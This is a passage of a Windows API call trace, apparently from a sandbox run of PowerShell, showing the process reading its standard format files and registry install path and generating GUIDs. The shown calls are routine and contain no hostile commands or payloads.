	[0756.897] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.898] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.898] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.898] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.899] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0xe67, lpOverlapped=0x0) returned 1
	[0756.899] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747227, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747227*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0756.899] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0756.900] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0756.900] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0756.900] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0756.900] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0756.900] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0756.900] RegCloseKey (hKey=0x2dc) returned 0x0
	[0756.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0756.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0756.911] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc9ec0f, Data2=0x48ac, Data3=0x4aed, Data4=([0]=0xa3, [1]=0x9e, [2]=0x91, [3]=0x3c, [4]=0x84, [5]=0x4c, [6]=0xef, [7]=0xad))) returned 0x0
	[0756.911] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x533c7f55, Data2=0xa4d9, Data3=0x4a28, Data4=([0]=0x97, [1]=0xbc, [2]=0x2c, [3]=0x4e, [4]=0x19, [5]=0xbe, [6]=0x6, [7]=0x48))) returned 0x0
	[0756.915] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7d943cf2, Data2=0xa33d, Data3=0x464f, Data4=([0]=0xb6, [1]=0x22, [2]=0xf0, [3]=0x6e, [4]=0xce, [5]=0x2c, [6]=0x66, [7]=0x30))) returned 0x0
	[0756.915] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe3073070, Data2=0xf18f, Data3=0x4723, Data4=([0]=0x83, [1]=0x65, [2]=0x15, [3]=0xa7, [4]=0x7b, [5]=0xd9, [6]=0xa2, [7]=0x79))) returned 0x0
	[0756.915] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe1f7427d, Data2=0xa123, Data3=0x4267, Data4=([0]=0xa7, [1]=0x1d, [2]=0x2, [3]=0x14, [4]=0x9e, [5]=0x2c, [6]=0x11, [7]=0x15))) returned 0x0
	[0756.916] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x54edf29a, Data2=0x228a, Data3=0x427d, Data4=([0]=0xa7, [1]=0x4f, [2]=0x65, [3]=0xc1, [4]=0x33, [5]=0x1, [6]=0xfb, [7]=0xa2))) returned 0x0
	[0756.916] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xba605f99, Data2=0x4000, Data3=0x496b, Data4=([0]=0xaf, [1]=0xab, [2]=0x8a, [3]=0x25, [4]=0x50, [5]=0xef, [6]=0x48, [7]=0x9d))) returned 0x0
	[0756.917] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1fb98bad, Data2=0x9903, Data3=0x4431, Data4=([0]=0xb9, [1]=0x8e, [2]=0x2e, [3]=0x1c, [4]=0x9b, [5]=0x86, [6]=0xd8, [7]=0x6e))) returned 0x0
	[0756.917] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x39fd998d, Data2=0xb1db, Data3=0x47dd, Data4=([0]=0x84, [1]=0xaf, [2]=0x37, [3]=0xf, [4]=0x63, [5]=0xa5, [6]=0xb5, [7]=0x90))) returned 0x0
	[0756.917] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1e16cb8a, Data2=0xf55c, Data3=0x41ba, Data4=([0]=0xbd, [1]=0x6f, [2]=0x6a, [3]=0x3f, [4]=0xcd, [5]=0x27, [6]=0xf1, [7]=0x5f))) returned 0x0
	[0756.917] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x59ce83c5, Data2=0x782, Data3=0x4a2e, Data4=([0]=0xae, [1]=0xac, [2]=0x42, [3]=0xbd, [4]=0x3, [5]=0x46, [6]=0x5c, [7]=0xf5))) returned 0x0
	[0756.918] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe95fe7f1, Data2=0xe18c, Data3=0x40e4, Data4=([0]=0xa8, [1]=0x16, [2]=0x61, [3]=0xf5, [4]=0x58, [5]=0x75, [6]=0x88, [7]=0x8))) returned 0x0
	[0756.918] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6cd65025, Data2=0x813a, Data3=0x45f1, Data4=([0]=0x9f, [1]=0xf7, [2]=0xb6, [3]=0xb0, [4]=0x9e, [5]=0x54, [6]=0x54, [7]=0x39))) returned 0x0
	[0756.918] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x715b6101, Data2=0xad00, Data3=0x48d9, Data4=([0]=0xa7, [1]=0xb3, [2]=0xad, [3]=0x66, [4]=0xc6, [5]=0x56, [6]=0x81, [7]=0x41))) returned 0x0
	[0756.919] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5edb0ed2, Data2=0x3cc7, Data3=0x4b3e, Data4=([0]=0x86, [1]=0x3d, [2]=0x1d, [3]=0x9d, [4]=0x25, [5]=0x79, [6]=0xd3, [7]=0x5))) returned 0x0
	[0756.919] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd8ebe731, Data2=0x76f0, Data3=0x4000, Data4=([0]=0x8c, [1]=0xa6, [2]=0x96, [3]=0x3a, [4]=0x76, [5]=0xc7, [6]=0x90, [7]=0xd4))) returned 0x0
	[0756.919] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x180c1a73, Data2=0x77b1, Data3=0x44aa, Data4=([0]=0xb2, [1]=0xa8, [2]=0x25, [3]=0x76, [4]=0x34, [5]=0x83, [6]=0x65, [7]=0xa9))) returned 0x0
	[0756.920] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xed0103b3, Data2=0x802a, Data3=0x4d38, Data4=([0]=0xb2, [1]=0x2a, [2]=0x85, [3]=0xd2, [4]=0xbb, [5]=0xec, [6]=0x8e, [7]=0x8a))) returned 0x0
	[0756.920] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb35e3edf, Data2=0xd1eb, Data3=0x4b50, Data4=([0]=0x93, [1]=0x1e, [2]=0x61, [3]=0xb6, [4]=0x75, [5]=0xf9, [6]=0xe3, [7]=0xe5))) returned 0x0
	[0756.921] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x66e66cfe, Data2=0x52c0, Data3=0x4cfd, Data4=([0]=0x98, [1]=0x22, [2]=0xa3, [3]=0xe, [4]=0x11, [5]=0x29, [6]=0x65, [7]=0xfb))) returned 0x0
	[0756.922] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4ef203b8, Data2=0x2958, Data3=0x4eb6, Data4=([0]=0xac, [1]=0x16, [2]=0xbb, [3]=0xd5, [4]=0x8c, [5]=0x85, [6]=0xea, [7]=0x91))) returned 0x0
	[0756.922] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x756e7ecc, Data2=0x10e6, Data3=0x4b31, Data4=([0]=0xb3, [1]=0xa8, [2]=0x2d, [3]=0x6, [4]=0x6e, [5]=0x36, [6]=0x21, [7]=0xdf))) returned 0x0
	[0756.923] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x23c82c1e, Data2=0x253c, Data3=0x4f07, Data4=([0]=0xbc, [1]=0x82, [2]=0x84, [3]=0x79, [4]=0x26, [5]=0xd8, [6]=0xa0, [7]=0xb6))) returned 0x0
	[0756.923] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf1b4e6f9, Data2=0x8bb7, Data3=0x4de7, Data4=([0]=0xad, [1]=0x9d, [2]=0x9d, [3]=0x46, [4]=0xa2, [5]=0xa7, [6]=0xde, [7]=0xce))) returned 0x0
	[0756.923] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xac4c8188, Data2=0xf5f5, Data3=0x451a, Data4=([0]=0x93, [1]=0x7d, [2]=0xd0, [3]=0xf9, [4]=0xf, [5]=0x96, [6]=0xab, [7]=0x6))) returned 0x0
	[0756.923] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x736af623, Data2=0x8036, Data3=0x4d4d, Data4=([0]=0xba, [1]=0xff, [2]=0x86, [3]=0xee, [4]=0x47, [5]=0xd1, [6]=0x35, [7]=0x76))) returned 0x0
	[0756.924] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x63e7ecb0, Data2=0xcb94, Data3=0x4a61, Data4=([0]=0x8c, [1]=0xec, [2]=0x9d, [3]=0xe2, [4]=0x88, [5]=0x81, [6]=0x1a, [7]=0x8d))) returned 0x0
	[0756.924] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe1d7e896, Data2=0xa4e0, Data3=0x4b12, Data4=([0]=0x80, [1]=0x2b, [2]=0x59, [3]=0x3c, [4]=0x87, [5]=0x36, [6]=0x73, [7]=0x20))) returned 0x0
	[0756.924] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x22a19c43, Data2=0x24d1, Data3=0x41fe, Data4=([0]=0xa3, [1]=0x97, [2]=0x73, [3]=0xa9, [4]=0xef, [5]=0x8f, [6]=0x2a, [7]=0x11))) returned 0x0
	[0756.925] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x21466d98, Data2=0xf14d, Data3=0x46aa, Data4=([0]=0xaf, [1]=0xff, [2]=0xf6, [3]=0x5b, [4]=0xc9, [5]=0xe1, [6]=0xc, [7]=0x9c))) returned 0x0
	[0756.925] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xeadff6a9, Data2=0x9d97, Data3=0x4dfd, Data4=([0]=0xb0, [1]=0x88, [2]=0x3a, [3]=0xf7, [4]=0xde, [5]=0x29, [6]=0x5, [7]=0xdc))) returned 0x0
	[0756.925] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe6d5af45, Data2=0x8a1e, Data3=0x495f, Data4=([0]=0x80, [1]=0x48, [2]=0xf, [3]=0xd2, [4]=0x36, [5]=0x84, [6]=0x46, [7]=0x52))) returned 0x0
	[0756.926] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfa56f3d, Data2=0xb868, Data3=0x47d2, Data4=([0]=0xb6, [1]=0xf6, [2]=0xa6, [3]=0x3a, [4]=0x76, [5]=0xba, [6]=0x91, [7]=0x5))) returned 0x0
	[0757.018] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x662ecf46, Data2=0xde36, Data3=0x447f, Data4=([0]=0x98, [1]=0x7b, [2]=0x4e, [3]=0xda, [4]=0x47, [5]=0x14, [6]=0x11, [7]=0xf))) returned 0x0
	[0757.018] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x186115d9, Data2=0x73b6, Data3=0x4f07, Data4=([0]=0xbe, [1]=0x2b, [2]=0x7f, [3]=0x18, [4]=0xb0, [5]=0xfa, [6]=0x1e, [7]=0x55))) returned 0x0
	[0757.019] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb2154a44, Data2=0x7ce8, Data3=0x4209, Data4=([0]=0x86, [1]=0x26, [2]=0x8b, [3]=0x83, [4]=0x9e, [5]=0xe4, [6]=0xb6, [7]=0xf))) returned 0x0
	[0757.019] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x41f76b9f, Data2=0x2ee1, Data3=0x4ad4, Data4=([0]=0xa3, [1]=0xf4, [2]=0x87, [3]=0x31, [4]=0x6b, [5]=0xa7, [6]=0xa7, [7]=0x83))) returned 0x0
	[0757.020] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1f3d0d8d, Data2=0xd1f1, Data3=0x44ed, Data4=([0]=0x8a, [1]=0x3c, [2]=0x90, [3]=0x4f, [4]=0xd9, [5]=0x3c, [6]=0x9f, [7]=0x57))) returned 0x0
	[0757.020] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xeabd4232, Data2=0x9313, Data3=0x4cb0, Data4=([0]=0xaa, [1]=0xe1, [2]=0x50, [3]=0xae, [4]=0xa, [5]=0x24, [6]=0xaf, [7]=0x15))) returned 0x0
	[0757.020] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x21682cb0, Data2=0x4e63, Data3=0x457f, Data4=([0]=0xa2, [1]=0xbd, [2]=0x58, [3]=0xb1, [4]=0xf6, [5]=0x4a, [6]=0x73, [7]=0xe8))) returned 0x0
	[0757.021] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2843a0, Data2=0x1eb9, Data3=0x44cd, Data4=([0]=0x90, [1]=0xca, [2]=0x7d, [3]=0x37, [4]=0xf9, [5]=0x58, [6]=0xbb, [7]=0x91))) returned 0x0
	[0757.022] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xecda5d48, Data2=0x90b, Data3=0x4260, Data4=([0]=0xb2, [1]=0x4d, [2]=0x18, [3]=0x9b, [4]=0x7b, [5]=0x5d, [6]=0x1c, [7]=0x9e))) returned 0x0
	[0757.022] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf81b4ab9, Data2=0x43bc, Data3=0x4eb6, Data4=([0]=0xaf, [1]=0x5a, [2]=0xbe, [3]=0x52, [4]=0xf8, [5]=0xcd, [6]=0x46, [7]=0xfe))) returned 0x0
	[0757.023] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x9776946e, Data2=0x9918, Data3=0x4e7d, Data4=([0]=0x83, [1]=0x11, [2]=0x2f, [3]=0x8a, [4]=0x6f, [5]=0x12, [6]=0x6, [7]=0xcb))) returned 0x0
	[0757.023] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x49077fc3, Data2=0xbf47, Data3=0x4416, Data4=([0]=0xa9, [1]=0x10, [2]=0x7f, [3]=0x6b, [4]=0x62, [5]=0xe4, [6]=0x78, [7]=0x50))) returned 0x0
	[0757.023] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcb37739a, Data2=0x24cf, Data3=0x4505, Data4=([0]=0x99, [1]=0x10, [2]=0xb4, [3]=0xae, [4]=0x31, [5]=0xd6, [6]=0xb, [7]=0x5d))) returned 0x0
	[0757.024] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd88ea8f5, Data2=0x5f6b, Data3=0x4b93, Data4=([0]=0x94, [1]=0x16, [2]=0x14, [3]=0xd5, [4]=0x9e, [5]=0xe9, [6]=0xf4, [7]=0xd3))) returned 0x0
	[0757.024] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x29d950b4, Data2=0x66fa, Data3=0x487e, Data4=([0]=0x89, [1]=0x1b, [2]=0x22, [3]=0x6d, [4]=0xcc, [5]=0xbf, [6]=0x3, [7]=0x48))) returned 0x0
	[0757.026] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0757.026] GetFileType (hFile=0x2dc) returned 0x1
	[0757.026] SetErrorMode (uMode=0x1) returned 0x1
	[0757.026] GetFileType (hFile=0x2dc) returned 0x1
	[0757.027] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.028] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.029] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.029] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.031] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x8b4, lpOverlapped=0x0) returned 1
	[0757.031] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a500c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a500c*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0757.031] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a5bf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x38a5bf0*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0757.031] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0757.031] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0757.031] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0757.031] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0757.032] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0757.032] RegCloseKey (hKey=0x2dc) returned 0x0
	[0757.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0757.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0757.052] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x20c0747, Data2=0x277, Data3=0x4471, Data4=([0]=0x96, [1]=0xec, [2]=0xf1, [3]=0x6f, [4]=0x8a, [5]=0x1c, [6]=0x56, [7]=0x5f))) returned 0x0
	[0757.052] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe5bfefa2, Data2=0xeabe, Data3=0x4350, Data4=([0]=0xad, [1]=0x35, [2]=0x11, [3]=0x48, [4]=0xb9, [5]=0x3b, [6]=0x66, [7]=0xfc))) returned 0x0
	[0757.052] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0757.053] GetFileType (hFile=0x2dc) returned 0x1
	[0757.053] SetErrorMode (uMode=0x1) returned 0x1
	[0757.053] GetFileType (hFile=0x2dc) returned 0x1
	[0757.053] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0xe98, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d8fd50, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d8fd50*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0757.054] ReadFile (in: hFile=0x2dc, lpBuffer=0x2d90750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x2d90750*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0757.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0757.055] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0757.055] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0757.055] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0757.055] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0757.055] RegCloseKey (hKey=0x2dc) returned 0x0
	[0758.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0758.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0758.292] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcaedb668, Data2=0x30dc, Data3=0x43ae, Data4=([0]=0xad, [1]=0x39, [2]=0xf1, [3]=0x96, [4]=0x28, [5]=0xff, [6]=0x35, [7]=0x2d))) returned 0x0
	[0758.292] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x20148348, Data2=0xa19c, Data3=0x4e67, Data4=([0]=0x94, [1]=0xec, [2]=0x88, [3]=0xb8, [4]=0xc3, [5]=0x80, [6]=0x1f, [7]=0xfc))) returned 0x0
	[0758.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
